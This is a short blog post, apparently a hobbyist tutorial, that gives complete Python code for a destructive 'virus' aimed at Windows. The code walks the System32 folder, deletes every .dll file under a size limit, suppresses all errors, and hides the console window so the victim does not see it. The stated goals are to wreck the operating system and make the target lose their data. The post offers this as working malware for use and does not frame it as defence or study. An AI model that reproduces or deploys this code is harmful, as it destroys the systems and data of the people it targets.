Atena Dadkhah
Posted on December 1, 2022
I've written a virus in Python which does a very tricky job!
The main goal is to write a virus which destroys Windos OS.
Important Files
As we know, one of the most important files in Windows OS is a file with .dll extension that is usually stored in C Drive which our Windows OS was installed.
So in this virus we're going to target .dll files which are vitally important for Windows OS and if we remove them, in addition to the destruction of the operating system, the target will also lose her/his data.
Libraries
OS
Provides functions for creating and removing a directory...etc.
Win32gui
Provides an interface to the native win32 GUI API.
Win32con
Extended Win32 process creation and management capabilities are accessible through this module.
Let's Code!
First you should import these libraries.
import os, win32gui, win32con
# Clear Terminal
clear = lambda: os.system('cls' or "clear")
clear()
Then we should specify the directory that we want to inspect, and the file extensions that are important for us.
# Path to inspect
path = "C:\\Windows\\System32\\"
# Max file size
maxFileSize = 21182681
# File extensions
EXTENSIONS = {".dll"}
Last step is to do a for loop in this path and in the files we'll have found, to see which file has .dll extension and then delete them.
try:
for dirname, dirpaths, filenames in os.walk(path):
for filename in filenames:
ext = os.path.splitext(filename)[-1]
# checks if a file has the specified extensions
if ext in EXTENSIONS:
x = os.path.join(dirname, filename)
# Checks if file doesn't have a large size
if os.path.getsize(x) < maxFileSize:
# REMOVING FILES
os.remove(x)
print("Deleted!")
except:
pass
While we're running this python file we can also hide CMD or the Terminal.
import os, win32gui, win32con
# Hide CMD
win32gui.ShowWindow(win32gui.GetForegroundWindow() , win32con.SW_HIDE)
If you're interested in this subject, you can take a look at this repository on GitHub.
Thanks! 👻
Posted on December 1, 2022
Join Our Newsletter. No Spam, Only the good stuff.
Sign up to receive the latest update from our blog.